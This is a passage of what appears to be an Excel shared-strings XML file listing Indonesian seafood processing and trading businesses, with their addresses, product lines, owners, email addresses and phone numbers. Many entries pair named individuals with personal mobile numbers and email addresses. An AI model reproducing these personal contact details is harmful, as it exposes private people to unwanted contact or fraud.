    <t>anugrahlestari12mks@gmail.com</t>
  </si>
  <si>
    <t>CV. LAUTAN JALAN MULIA</t>
  </si>
  <si>
    <t>Jl. Raya Manado - Bitung, Kel. Sagerat, Kec. Matuari, Kota Bitung</t>
  </si>
  <si>
    <t>LIDIA ADELIN MAMESAH</t>
  </si>
  <si>
    <t>erwinpandegiroth@gmail.com</t>
  </si>
  <si>
    <t>O81383927114</t>
  </si>
  <si>
    <t>UD. ALAM BIRU INDAH</t>
  </si>
  <si>
    <t>Jl. Brigjen Zein Hamid Komp. Citra Baru No.39, Kel. Titi Kuning, Kec. Medan Johor, Kota Medan</t>
  </si>
  <si>
    <t>Teripang Kering, Perut Ikan Kering, Sirip Hiu Kering, Tulang Ikan Kering, Kulit Ikan Kering</t>
  </si>
  <si>
    <t>Hendra Tina</t>
  </si>
  <si>
    <t>Medan Johor</t>
  </si>
  <si>
    <t>Titi Kuning</t>
  </si>
  <si>
    <t>ud.alambiruindah@gmail.com</t>
  </si>
  <si>
    <t>Hendra Tina &amp; 08116328977</t>
  </si>
  <si>
    <t>PT. SUMBER USAHA NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan</t>
  </si>
  <si>
    <t>Daging Kerang Beku, Daging Kepiting Rebus Beku, Kerang Beku, Siput Beku, Kepiting Lunak Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku, Cephalopoda Segar, Ikan Pelagis Segar, Ikan Demersal Segar, Lobster Air Tawar Beku, Udang Beku, Udang Segar, Siput Segar, Lobster Air Tawar Segar, Udang Kering</t>
  </si>
  <si>
    <t>Herman Tandiah</t>
  </si>
  <si>
    <t>hermantandiah2511@gmail.com</t>
  </si>
  <si>
    <t>Jl. Kima Raya I Blok D No.2C, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Udang Kipas Segar, Udang Mentah Beku, Udang Rebus Beku, Udang Kipas Beku</t>
  </si>
  <si>
    <t>nurjannah.bomar@gmsil.com</t>
  </si>
  <si>
    <t>Jl. Lamelleng No.42, Kel. Bojo Baru, Kec. Mallusetasi, Kabupaten Barru</t>
  </si>
  <si>
    <t>Segar, Beku, Kaleng</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi Dingin, Tuna Beku, Daging Rajungan Pasteurisasi Beku, Ikan Demersal Beku, Fillet Tuna Segar, Ikan Pelagis Segar, Ikan Pelagis Beku, Fillet Ikan Segar, Tuna Kaleng</t>
  </si>
  <si>
    <t>Mallusetasi</t>
  </si>
  <si>
    <t>Bojo Baru</t>
  </si>
  <si>
    <t>irma@phillipsfoods.com</t>
  </si>
  <si>
    <t>0421-21105</t>
  </si>
  <si>
    <t>Irmawati 0811410105</t>
  </si>
  <si>
    <t>A.M. Yusuf Kadir</t>
  </si>
  <si>
    <t>PT. TIMURAMA BOSI INVESTAMA</t>
  </si>
  <si>
    <t>Jl. KH Abdul Jabbar Ashiry No.100, Kel. Pai, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>A. Ibrahim Irwan Marzuki</t>
  </si>
  <si>
    <t>Pai</t>
  </si>
  <si>
    <t>timuramabosiinvestama@gmail.com</t>
  </si>
  <si>
    <t>0411 4679397 / 0818 0881 8883</t>
  </si>
  <si>
    <t>A. Ibrahim / 0812 8210 1827</t>
  </si>
  <si>
    <t>KOPERASI NELAYAN BERKAH BAHARI SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Harapan Gang Cempaka RT 03, Kel. Tungkal Harapan, Kec. Tungkal Ilir, Kabupaten Tanjung Jabung Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Udang Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>Suryan</t>
  </si>
  <si>
    <t>Tungkal Harapan</t>
  </si>
  <si>
    <t>Suryan.jn1@gmail.com</t>
  </si>
  <si>
    <t>Suryan &amp; 08117456990</t>
  </si>
  <si>
    <t>Jl. Raya Cirebon - Bandung Km 35 Blok Pos RT 02 RW 07, Kel. Sindangwasa, Kec. Palasah, Kabupaten Majalengka</t>
  </si>
  <si>
    <t>Eddy Surya</t>
  </si>
  <si>
    <t>Palasah</t>
  </si>
  <si>
    <t>Sindangwasa</t>
  </si>
  <si>
    <t>qa.supervisor@cedeaseafood.com</t>
  </si>
  <si>
    <t>Iska Sri Darmah &amp; 085692444660</t>
  </si>
  <si>
    <t>Iska Sri Darmah</t>
  </si>
  <si>
    <t>PT. SARI LAUT NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Kav DPR No.181, Kel. Serua, Kec. Bojong Sari, Kota Depok</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Pelagis Segar, Salmon Beku, Trout Beku, Salmon Segar, Trout Segar, Cephalopoda Beku, Ikan Demersal Beku, Ikan Demersal Segar, Surimi Beku</t>
  </si>
  <si>
    <t>achmad fachmi</t>
  </si>
  <si>
    <t>Bojong sari</t>
  </si>
  <si>
    <t>sarilautnusantara20@yahoo.com</t>
  </si>
  <si>
    <t>asep suwarno 087875552763</t>
  </si>
  <si>
    <t>asep suwarno</t>
  </si>
  <si>
    <t>PT. PALMA MARINAIO NUSANTARA</t>
  </si>
  <si>
    <t>mutiarabarauntu@gmail.com</t>
  </si>
  <si>
    <t>Mutiara 081331147212</t>
  </si>
  <si>
    <t>CV. JESSLYN INDAH LESTARI</t>
  </si>
  <si>
    <t>Dusun Nirwana RT 10 RW 04, Kel. Sungai Kakap, Kec. Sungai Kakap, Kabupaten Kubu Raya</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Pelagis Segar, Udang Segar, Rajungan Segar, Cephalopoda Segar</t>
  </si>
  <si>
    <t>GOUW TIE HONG</t>
  </si>
  <si>
    <t>Sungai Kakap</t>
  </si>
  <si>
    <t>Dedy.lim1898@gmail.com</t>
  </si>
  <si>
    <t>GOUW TIE HONG / 082158355577</t>
  </si>
  <si>
    <t>PT. SELT ALGA INDONESIA</t>
  </si>
  <si>
    <t>Green Sedayu Biz Park Cakung Blok GS-06 No.38 RT 011 RW 006, Kel. Cakung Timur, Kec. Cakung, Kota Jakarta Timur</t>
  </si>
  <si>
    <t>Handi Ajie</t>
  </si>
  <si>
    <t>seltalgaindonesia@gmail.com</t>
  </si>
  <si>
    <t>Maya Puspita 081384099076</t>
  </si>
  <si>
    <t>PT. PAN PUTRA SAMUDRA</t>
  </si>
  <si>
    <t>Jl. Raya Rembang - Tuban Km 32, Desa Sumurtawang, Kec. Kragan, Kabupaten Rembang</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi, Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Mardame Silitonga</t>
  </si>
  <si>
    <t>Sumurtawang</t>
  </si>
  <si>
    <t>mazid.faizin@gmail.com</t>
  </si>
  <si>
    <t>0356 412598</t>
  </si>
  <si>
    <t>Daromi/ 08112784516</t>
  </si>
  <si>
    <t>CV. USAHA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Polos Salok Api RT 02, Kel. Salok Api Laut, Kec. Samboja, Kabupaten Kutai Kartanegara</t>
  </si>
  <si>
    <t>Kepiting Soka Beku, Daging Kerang Beku</t>
  </si>
  <si>
    <t>Ucok Taman</t>
  </si>
  <si>
    <t>Samboja</t>
  </si>
  <si>
    <t>Salok Api Laut</t>
  </si>
  <si>
    <t>cvusahamandiri2020@gmail.com</t>
  </si>
  <si>
    <t>Ucok Taman 081346325272</t>
  </si>
  <si>
    <t>PT. PUTRA CITRA HASIL LAUT</t>
  </si>
  <si>
    <t>Jl. Blanak Blok A No.10, Komplek Pelabuhan PPP Tegalsari, Kel. Tegalsari, Kec. Tegal Barat, Kota Tegal</t>
  </si>
  <si>
    <t>ANTONY</t>
  </si>
  <si>
    <t>pchl.tegal@gmail.com</t>
  </si>
  <si>
    <t>NUGROHO - 081286510282</t>
  </si>
  <si>
    <t>DAPUR SAUJA</t>
  </si>
  <si>
    <t>Tridaya Nuansa Indah, Jl. Kelapa Gading Raya EA.9 No.12A, Kel. Sumber Jaya, Kec. Tambun Selatan, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Otak-Otak Ikan, Pempek Ikan, Tekwan</t>
  </si>
  <si>
    <t>Dwi Sari Widiastuti</t>
  </si>
  <si>
    <t>dwiarjatech@gmail.com</t>
  </si>
  <si>
    <t>021-88320464</t>
  </si>
  <si>
    <t>Dwi Sari Widiastuti   HP 081314008812</t>
  </si>
  <si>
    <t>PT. ASNUR ANTON JAYA</t>
  </si>
  <si>
    <t>Jl. Tol Lama Pergudangan Karunia Sulawesi Blok G No.11, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>MUH. ASNUR</t>
  </si>
  <si>
    <t>ptasnurantonjaya18@gmail.com</t>
  </si>
  <si>
    <t>MUH. ASNUR / 081341566102</t>
  </si>
  <si>
    <t>PT. HARAPAN MUJUR SAMUDERA</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Samudera Kendari Jl. Samudera No.1, Kel. Puday, Kec. Abeli, Kota Kendari</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Kerang Beku, Ikan Pelagis Beku, Tuna Beku</t>
  </si>
  <si>
    <t>H. MARSONO</t>
  </si>
  <si>
    <t>pthms.kdi@gmail.com</t>
  </si>
  <si>
    <t>085145895118 / 081245952019</t>
  </si>
  <si>
    <t>IFAN NURYANTO  / 085145895118</t>
  </si>
  <si>
    <t>IFAN NURYANTO</t>
  </si>
  <si>
    <t>PT. SINGGASANA UNAGI INDONESIA</t>
  </si>
  <si>
    <t>Dusun Jatisari RT 001 RW 002, Kel. Bomo, Kec. Blimbingsari, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Sidat Panggang Beku</t>
  </si>
  <si>
    <t>TOSHIHIRO NAKAMURA</t>
  </si>
  <si>
    <t>Blimbingsari</t>
  </si>
  <si>
    <t>Bomo</t>
  </si>
  <si>
    <t>wahyu@unagi.co.id</t>
  </si>
  <si>
    <t>081394009800, Wahyu : 085236672530</t>
  </si>
  <si>
    <t>ALBERTUS BENI F. SITANGGANG &amp; 0819691400, ARQI &amp; 082333358735, WAHYU &amp; 085236672530</t>
  </si>
  <si>
    <t>ALBERTUS BENI F. SITANGGANG</t>
  </si>
  <si>
    <t>PT. TERUSAN JAYA BERSAMA</t>
  </si>
  <si>
    <t>Pulau Abang, Kel. Pulau Abang, Kec. Galang, Kota Batam</t>
  </si>
  <si>
    <t>TANG BONG HONG</t>
  </si>
  <si>
    <t>Galang</t>
  </si>
  <si>
    <t>Pulau Abang</t>
  </si>
  <si>
    <t>terusanjayabersama@gmail.com</t>
  </si>
  <si>
    <t>Tang Bong Hong/ 085264135535</t>
  </si>
  <si>
    <t>PT. SURYA PUTRA SIMALUNGUN</t>
  </si>
  <si>
    <t>Jl. Mulawarman RT 3, Desa Kerayaan, Kec. Sangkulirang, Kabupaten Kutai Timur</t>
  </si>
  <si>
    <t>ABDUL WAHID</t>
  </si>
  <si>
    <t>Sangatta Utara</t>
  </si>
  <si>
    <t>Swarga Bara</t>
  </si>
  <si>
    <t>suryaputrasimalungun.pt@gmail.com</t>
  </si>
  <si>
    <t>Dewi Karika Sari, SP &amp; 081346669599</t>
  </si>
  <si>
    <t>PT. BARUNA SEJAHTERA PERSADA</t>
  </si>
  <si>
    <t>Jl. Dermaga Penyebrangan Kali Adem No.21 Room 06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Fransiska Diah Palupi</t>
  </si>
  <si>
    <t>barunasejahterapersada@gmail.com</t>
  </si>
  <si>
    <t>021-5748891</t>
  </si>
  <si>
    <t>Moh Fadhil / 082245249263</t>
  </si>
  <si>
    <t>Dusun Kampungbaru RT 04 RT 03, Kel. Grajagan, Kec. Purwoharjo, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>CHUNG CHIA YU</t>
  </si>
  <si>
    <t>Purwoharjo</t>
  </si>
  <si>
    <t>Grajagan</t>
  </si>
  <si>
    <t>i_CDF@yahoo.co.id</t>
  </si>
  <si>
    <t>0333-4460465</t>
  </si>
  <si>
    <t>FYRA 085204909848</t>
  </si>
  <si>
    <t>PT. MARINA BAHARI SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Ringroad Dusun Pereng RT 001 RW 007, Kel. Gendong Kulon, Kec. Babat, Kabupaten Lamongan</t>
  </si>
  <si>
    <t>deliana</t>
  </si>
  <si>
    <t>marinabaharisejahtera@yahoo.com</t>
  </si>
  <si>
    <t>Jl. Trans Manado-Bitung, Desa Kauditan II Jaga XIII, Kec. Kauditan, Kabupaten Minahasa Utara</t>
  </si>
  <si>
    <t>Willy Tjahjono</t>
  </si>
  <si>
    <t>Kauditan II</t>
  </si>
  <si>
    <t>mjl.bitung@gmail.com</t>
  </si>
  <si>
    <t>Jl. Mahendradatta No.15E-F, Kel. Padangsambian, Kec. Denpasar Barat, Kota Denpasar</t>
  </si>
  <si>
    <t>Salmon Segar, Salmon Beku, Ikan Demersal Segar, Ikan Demersal Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Kerang Segar, Kerang Beku, Kepiting Segar, Kepiting Beku, Cephalopoda Segar, Cephalopoda Beku, Telur Ikan Segar, Telur Ikan Beku, Nori, Tuna Segar, Tuna Beku, Udang Segar, Udang Beku</t>
  </si>
  <si>
    <t>Pinnywati Chandra</t>
  </si>
  <si>
    <t>Padangsambian</t>
  </si>
  <si>
    <t>baliqa@masuya.co.id</t>
  </si>
  <si>
    <t>0361-754248</t>
  </si>
  <si>
    <t>Herlina</t>
  </si>
  <si>
    <t>CV. AWANINDO MANDIRI</t>
  </si>
  <si>
    <t>Pelabuhan Perikanan Untia, Kel. Untia, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Udang Beku, Udang Segar, Tuna Beku, Tuna Segar, Ikan Demersal Beku, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>H. Andi Baso Mappaewa</t>
  </si>
  <si>
    <t>Untia</t>
  </si>
  <si>
    <t>awnmandiri@gmail.com</t>
  </si>
  <si>
    <t>H. Andi Baso Mappaewa 0811442028</t>
  </si>
  <si>
    <t>ORANGE FOOD</t>
  </si>
  <si>
    <t>Jl. Taman Anggrek, Kenayan, Kel. Wedomartani, Kec. Ngemplak, Kabupaten Sleman</t>
  </si>
  <si>
    <t>IMELDA</t>
  </si>
  <si>
    <t>Wedomartani</t>
  </si>
  <si>
    <t>orangefoodtuna@gmail.com</t>
  </si>
  <si>
    <t>Imelda 081326189986</t>
  </si>
  <si>
    <t>PT. BUMI MENARA INTERNUSA - DAMPIT</t>
  </si>
  <si>
    <t>Jl. Pahlawan No.1-3, Kel. Dampit, Kec. Dampit, Kabupaten Malang</t>
  </si>
  <si>
    <t>Udang Mentah Beku, Udang Rebus Beku, Ikan Hasil Budidaya Beku, Cephalopoda Beku, Tuna Beku, Ikan Demersal Beku, Daging Bekicot Beku, Seafood Bernilai Tambah Beku , Seafood Bernilai Tambah Masak Beku</t>
  </si>
  <si>
    <t>Dampit</t>
  </si>
  <si>
    <t>qa.martha@dpt.ptbmi.com</t>
  </si>
  <si>
    <t>0341-896121</t>
  </si>
  <si>
    <t>MARTHA  0341-896121</t>
  </si>
  <si>
    <t>CV. MUSTIKA</t>
  </si>
  <si>
    <t>Pergudangan Sentra Kosambi Blok E/16, Kel. Kosambi Timur, Kec. Kosambi, Kota Tangerang</t>
  </si>
  <si>
    <t>Kerupuk Kulit Ikan</t>
  </si>
  <si>
    <t>ely</t>
  </si>
  <si>
    <t>kosambi timur</t>
  </si>
  <si>
    <t>CVMUSTIKA603@GMAIL.COM</t>
  </si>
  <si>
    <t>CV. SUGARINDO TRADING CO</t>
  </si>
  <si>
    <t>Jl. Bakau No.60, Kel. Balandai, Kec. Bara, Kota Palopo</t>
  </si>
  <si>
    <t xml:space="preserve">H.M. ROEM LA TUNRUNG SH </t>
  </si>
  <si>
    <t>Bara</t>
  </si>
  <si>
    <t>Balandai</t>
  </si>
  <si>
    <t>sugarindo_mks@yahoo.com</t>
  </si>
  <si>
    <t>0411-424566</t>
  </si>
  <si>
    <t>UNI/085299079380</t>
  </si>
  <si>
    <t>PERUM PERIKANAN INDONESIA CABANG MERAUKE</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Nusantara Merauke, Kel. Karang Indah, Kec. Merauke, Kabupaten Merauke</t>
  </si>
  <si>
    <t>Ikan Demesal Beku, Ikan Air Tawar Beku</t>
  </si>
  <si>
    <t>Fatah Setiawan Topobroto</t>
  </si>
  <si>
    <t>Adeyandri22@gmail.com</t>
  </si>
  <si>
    <t>0971-3331598</t>
  </si>
  <si>
    <t>Andrianus 081210033729</t>
  </si>
  <si>
    <t>Andrianus</t>
  </si>
  <si>
    <t>CV. VELINDO MANDIRI</t>
  </si>
  <si>
    <t>Jl. Raya Pati - Juwana Km. 7 Dk. Guyangan, Kel. Purworejo, Kec. Pati, Kabupaten Pati</t>
  </si>
  <si>
    <t>Dewi Ratnasari</t>
  </si>
  <si>
    <t>cvvelindo89@gmail.com</t>
  </si>
  <si>
    <t>(0295) 410 3006</t>
  </si>
  <si>
    <t>Dewi Ratnasari, 0212 4980 9339</t>
  </si>
  <si>
    <t>POKLAHSAR TORANI SUMBER MAKMUR</t>
  </si>
  <si>
    <t>Jl. Kalijaga No.173, Kel. Pegambiran, Kec. Lemahwungkuk, Kota Cirebon</t>
  </si>
  <si>
    <t>MOCHAMAD SOLACHUDIN</t>
  </si>
  <si>
    <t>Pegambiran</t>
  </si>
  <si>
    <t>kodin_bery@yahoo.co.id</t>
  </si>
  <si>
    <t>MOCHAMAD SOLACHUDIN &amp; 081222090857</t>
  </si>
  <si>
    <t>PT. SINAR LAUTAN TERPADU</t>
  </si>
  <si>
    <t>Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Cephalopoda Segar, Ikan Pelagis Beku, Ikan Pelagis Segar, Ikan Demersal Beku, Ikan Demersal Segar, Rajungan Beku, Rajungan Segar, Kerang Beku, Kerang Segar, Pari Beku, Pari Segar, Hiu Beku, Udang Beku, Udang Segar, Udang Kipas Beku, Udang Kipas Segar, Bandeng Beku, Bandeng Segar, Tuna Beku, Tuna Segar, Lobster Beku, Lobster Segar</t>
  </si>
  <si>
    <t>JONI DJAINI</t>
  </si>
  <si>
    <t>sinarlautanterpadu540@gmail.com</t>
  </si>
  <si>
    <t>021-6612132</t>
  </si>
  <si>
    <t>Mohamad Fadil/082245249263</t>
  </si>
  <si>
    <t>MENARA JAYA FOODS</t>
  </si>
  <si>
    <t>Jl. Warujaya I Blok A No.117 RT 006 RW 022, Kel. Mekarjaya, Kec. Sukmajaya, Kota Depok</t>
  </si>
  <si>
    <t>Ikan Olahan Lapis Kulit Tahu, Seafood Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Eramida Miranti</t>
  </si>
  <si>
    <t>Sukmajaya</t>
  </si>
  <si>
    <t>Mekarjaya</t>
  </si>
  <si>
    <t>menarajayafoods@gmail.com</t>
  </si>
  <si>
    <t>Era 082110431182</t>
  </si>
  <si>
    <t>CV. KERAPU EMAS PAPUA</t>
  </si>
  <si>
    <t>Jl. Kanal Victory Komplek Perindustrian, Kota Sorong</t>
  </si>
  <si>
    <t>FITRA LESTARI NURKAMIDIN LIEPATTY</t>
  </si>
  <si>
    <t>Sorong Timur</t>
  </si>
  <si>
    <t>Kladufu</t>
  </si>
  <si>
    <t>ferrieagusgowijaya@gmail.com</t>
  </si>
  <si>
    <t>082399433694/FITRA</t>
  </si>
  <si>
    <t>POKLAHSAR PRIMA MELATI</t>
  </si>
  <si>
    <t>Patemon RT 002 RW 001, Kel. Patemon, Kec. Bojongsari, Kabupaten Purbalingga</t>
  </si>
  <si>
    <t>Abon Ikan, Produk Perikanan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Yelfia</t>
  </si>
  <si>
    <t>Patemon</t>
  </si>
  <si>
    <t>marisafood@gmail.com</t>
  </si>
  <si>
    <t>Yelfia/ 081378711130</t>
  </si>
  <si>
    <t>UD. EVI TENGGIRI</t>
  </si>
  <si>
    <t>Jl. Teluk Serpang No.5, Kel. Sumber Jaya, Kec. Kampung Melayu, Kota Bengkulu</t>
  </si>
  <si>
    <t>Pempek Ikan, Surimi Beku</t>
  </si>
  <si>
    <t>Saifudin Azwar</t>
  </si>
  <si>
    <t>evitenggiri@yahoo.com</t>
  </si>
  <si>
    <t>Saifudin Azwar/082179414481</t>
  </si>
  <si>
    <t>PT. GILANG JAYARAYA</t>
  </si>
  <si>
    <t>Jl. Raya Gilang No. 170, Kel. Gilang, Kec. Taman, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>FREDDY KENUWIARJA</t>
  </si>
  <si>
    <t>Gilang</t>
  </si>
  <si>
    <t>gilangjayaraya100@gmail.com</t>
  </si>
  <si>
    <t>HENDRI KENUWIARJA</t>
  </si>
  <si>
    <t>CV. SUMBER REJEKI</t>
  </si>
  <si>
    <t>Jl. Pangeran Ratu Pasar Induk Jakabaring A-1 RT 025 RW 009, Kel. 15 Ulu, Kec. Jakabaring, Kota Palembang</t>
  </si>
  <si>
    <t>TEDDY</t>
  </si>
  <si>
    <t>Jakabaring</t>
  </si>
  <si>
    <t>15 Ulu</t>
  </si>
  <si>
    <t>syarifudinibrahim397@gmail.com</t>
  </si>
  <si>
    <t>082282090905; 081271190905</t>
  </si>
  <si>
    <t>Syarifudin Ibrahim</t>
  </si>
  <si>
    <t>CV. AHUAT STAR</t>
  </si>
  <si>
    <t>Jl. Jemadi Komplek Jumadi Permai No.1A, Kel. Pulo Brayan Barat II, Kec. Medan Timur, Kota Medan</t>
  </si>
  <si>
    <t>Daging Kepiting Rebus Beku</t>
  </si>
  <si>
    <t>OEI BOEN HUAT</t>
  </si>
  <si>
    <t>Pulo Brayan Barat II</t>
  </si>
  <si>
    <t>ahuatstar123@gmail.com</t>
  </si>
  <si>
    <t>OEI BOEN HUAT / 082166226888</t>
  </si>
  <si>
    <t>MIMI</t>
  </si>
  <si>
    <t>Dermaga Desa Laha, Kel. Laha, Kec. Teluk Ambon, Kota Ambon</t>
  </si>
  <si>
    <t>mochramadhanrakhas@gmail.com</t>
  </si>
  <si>
    <t>Lester Maringka (no. HP 085243003000)</t>
  </si>
  <si>
    <t>CV. SAYF ELHAQ</t>
  </si>
  <si>
    <t>Dusun Damai Indah, Kel. Alue Dua, Kec. Langsa Baro, Kota Langsa</t>
  </si>
  <si>
    <t>Kepiting Kulit Lunak Beku, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>Armansyah</t>
  </si>
  <si>
    <t>Langsa Baro</t>
  </si>
  <si>
    <t>Alue Dua</t>
  </si>
  <si>
    <t>Irma 085285634963</t>
  </si>
  <si>
    <t>CV. ALAM MULIA BAHARI</t>
  </si>
  <si>
    <t>Jl. Pelabuhan Baru, Kel. Bagan Barat, Kec. Bangko, Kabupaten Rokan Hilir</t>
  </si>
  <si>
    <t>ICUK SUHADI</t>
  </si>
  <si>
    <t>Bangko</t>
  </si>
  <si>
    <t>Bagan Barat</t>
  </si>
  <si>
    <t>alammuliabahari@gmail.com</t>
  </si>
  <si>
    <t>ICUK SUHADI &amp; 082166061972</t>
  </si>
  <si>
    <t>JIMMY</t>
  </si>
  <si>
    <t>Jl. Nusantara Laut RT 004 RW 005, Kel. Tanjungbalai Kota, Kec. Karimun, Kabupaten Karimun</t>
  </si>
  <si>
    <t>Tanjungbalai Kota</t>
  </si>
  <si>
    <t>jimmy.ahau889@gmail.com</t>
  </si>
  <si>
    <t>Jimmy/ 085376715755</t>
  </si>
  <si>
    <t>WANDI, SE</t>
  </si>
  <si>
    <t>Jl. Antena Baran Dua Meral RT 003 RW 004, Kel. Meral, Kec. Karimun, Kabupaten Karimun</t>
  </si>
  <si>
    <t>Wandi, Se</t>
  </si>
  <si>
    <t>wandi.devotion@gmail.com</t>
  </si>
  <si>
    <t>wandi/ 085264888886</t>
  </si>
  <si>
    <t>Wandi, SE</t>
  </si>
  <si>
    <t>PT. FRESH TUNA INDONESIA</t>
  </si>
  <si>
    <t>Jl. Raya Maumbi Jaga XVI, Kel. Mapanget, Kec. Talawaan, Kabupaten Minahasa Utara</t>
  </si>
  <si>
    <t>MOHAMMAD ROPID</t>
  </si>
  <si>
    <t>Talawaan</t>
  </si>
  <si>
    <t>fti.freshtunaindonesia@gmail.com</t>
  </si>
  <si>
    <t>M. ROFIT</t>
  </si>
  <si>
    <t>Mohammad Ropid</t>
  </si>
  <si>
    <t>PT. METROPOLITAN MINA BAHARI</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Gudang PPI No. 52, 53, dan 54, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Udang Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>Willians</t>
  </si>
  <si>
    <t>pt.mmb32@gmail.com</t>
  </si>
  <si>
    <t>Willians 081260979544</t>
  </si>
  <si>
    <t>LEZZATO CAMILAN BEKU</t>
  </si>
  <si>
    <t>Madulegi RT 04 RW 10, Kel. Plintahan, Kec. Pandaan, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku, Cumi-cumi Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>GANDI PURNOMO</t>
  </si>
  <si>
    <t>Plintahan</t>
  </si>
  <si>
    <t>lezzatoukm@gmail.com</t>
  </si>
  <si>
    <t>085755533189, 081216108608</t>
  </si>
  <si>
    <t>GANDI PURNOMO (085755533189, 081216108608) BAMBANG (081231166838)</t>
  </si>
  <si>
    <t>KOPERASI PRODUSEN SIMPUL DISTRIBUSI KOMODITI</t>
  </si>
  <si>
    <t>Desa Cenrana, Kec. Cenrana, Kabupaten Bone</t>
  </si>
  <si>
    <t>Marhawa Pelafu</t>
  </si>
  <si>
    <t>Cenrana</t>
  </si>
  <si>
    <t>koperasi_sidik@yahoo.co.id</t>
  </si>
  <si>
    <t>Marhawa &amp; 085255699696</t>
  </si>
  <si>
    <t>Marhama Palefu, SE</t>
  </si>
  <si>
    <t>CV. KLAMANA ANUGERAH IRIA</t>
  </si>
  <si>
    <t>Jl. Janis (Perum BRI No.02), Kel. Klamana, Kec. Sorong Timur, Kota Sorong</t>
  </si>
  <si>
    <t xml:space="preserve">Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering, Teripang Kering, Gelembung Ikan Kering, Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering </t>
  </si>
  <si>
    <t>SUBAGIO HARYONO,SE</t>
  </si>
  <si>
    <t>Klamana</t>
  </si>
  <si>
    <t>ferrieagusgowijaja@gmail.com</t>
  </si>
  <si>
    <t>BAGIO/082221749800</t>
  </si>
  <si>
    <t>MAK MIL FROZEN FOOD</t>
  </si>
  <si>
    <t>Perum Taman Hang Tuah Blok A5 No.14 RT 001 RW 006, Kel. Baloi Permai, Kec. Batam Kota, Kota Batam</t>
  </si>
  <si>
    <t>Mila Kurwana</t>
  </si>
  <si>
    <t>Baloi Permai</t>
  </si>
  <si>
    <t>mila_74064@yahoo.co.id</t>
  </si>
  <si>
    <t>Mila Kurwana 085216173031</t>
  </si>
  <si>
    <t>CV. SURYA UTARA JAYA</t>
  </si>
  <si>
    <t>Jl. Sinaboi Kecil Kuala, Kel. Sungai Bakau, Kec. Sinaboi, Kabupaten Rokan Hilir</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Pelagis Segar, Udang Kering, Udang Segar</t>
  </si>
  <si>
    <t>Surya Candra</t>
  </si>
  <si>
    <t>Sungai Bakau</t>
  </si>
  <si>
    <t>cvsuryautarajaya@gmail.com</t>
  </si>
  <si>
    <t>Surya Candra 081364294896</t>
  </si>
  <si>
    <t>PT. SINAR MUTIARA EXPRES</t>
  </si>
  <si>
    <t>Ikan Asin Kering, Perut Ikan Kering, Teripang Kering, Cacing Laut Kering, Sirip Hiu Kering, Sirip Pari Kering, Kulit Pari Kering</t>
  </si>
  <si>
    <t>SYAFRIZAL</t>
  </si>
  <si>
    <t>sinarmutiaraexpres.pt@yahoo.com</t>
  </si>
  <si>
    <t>SYAFRIZAL 085692365555</t>
  </si>
  <si>
    <t>PT. INDONESIA ANEKA PERIKANAN</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok M No.1-2 (Room Nomor 3), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Udang Beku, Kepiting Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Scallop Beku</t>
  </si>
  <si>
    <t>Suasan</t>
  </si>
  <si>
    <t>inari.aruna@gmail.com</t>
  </si>
  <si>
    <t>021-6625364</t>
  </si>
  <si>
    <t>Sullivan -  08125000503</t>
  </si>
  <si>
    <t>Surya Lung</t>
  </si>
  <si>
    <t>POKLAHSAR HIKMAH</t>
  </si>
  <si>
    <t>RT 01 RW 11 Lingkungan Teleng, Kel. Sidoharjo, Kec. Pacitan, Kabupaten Pacitan</t>
  </si>
  <si>
    <t>Abon Tuna, Produk Perikanan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Munarsih</t>
  </si>
  <si>
    <t>poklahsarhikmahpacitan@gmail.com</t>
  </si>
  <si>
    <t>Munarsih 087702360127</t>
  </si>
  <si>
    <t>NAVAR BAHARI RAYA</t>
  </si>
  <si>
